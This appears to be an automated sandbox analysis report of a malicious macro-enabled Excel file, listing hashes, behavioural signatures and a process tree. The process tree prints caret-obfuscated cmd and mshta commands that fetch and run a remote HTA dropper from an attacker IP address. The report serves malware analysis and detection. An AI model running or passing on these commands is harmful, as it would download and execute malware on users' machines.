Analysis

  • max time kernel
    161s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    22-04-2022 00:05

General

  • Target

    ?i=1ivkhiiaz.xlsm

  • Size

    114KB

  • MD5

    f8ecaf3d4168b075f418c121a763ae0f

  • SHA1

    cd99515256f845d4b6ca4f8a4f5ff6d0f1d0eff3

  • SHA256

    d145d8bd97ef82aed65a01e30b7523f9380bdef7e4af3cbb706c3fe571d2accb

  • SHA512

    bb37a13fdef41887f119faf79af415cb14a894f9b5ef757a7be9a665afcd0df5a491b6b4a4bf0ed46c5e6b6a0dcd247ad52e1f94b4567d1287d319ed7459ce60

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://92.255.57.195/sec/sec.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\_i=1ivkhiiaz.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3220
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:5068
      • C:\Windows\system32\mshta.exe
        mshta http://0x5cff39c3/sec/sec.html
        3⤵
        • Blocklisted process makes network request
        PID:860

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/860-138-0x0000000000000000-mapping.dmp
  • memory/3220-130-0x00007FFCA1790000-0x00007FFCA17A0000-memory.dmp
    Filesize

    64KB

  • memory/3220-131-0x00007FFCA1790000-0x00007FFCA17A0000-memory.dmp
    Filesize

    64KB

  • memory/3220-132-0x00007FFCA1790000-0x00007FFCA17A0000-memory.dmp
    Filesize

    64KB

  • memory/3220-133-0x00007FFCA1790000-0x00007FFCA17A0000-memory.dmp
    Filesize

    64KB

  • memory/3220-134-0x00007FFCA1790000-0x00007FFCA17A0000-memory.dmp
    Filesize

    64KB

  • memory/3220-135-0x00007FFC9F660000-0x00007FFC9F670000-memory.dmp
    Filesize

    64KB

  • memory/3220-136-0x00007FFC9F660000-0x00007FFC9F670000-memory.dmp
    Filesize

    64KB

  • memory/5068-137-0x0000000000000000-mapping.dmp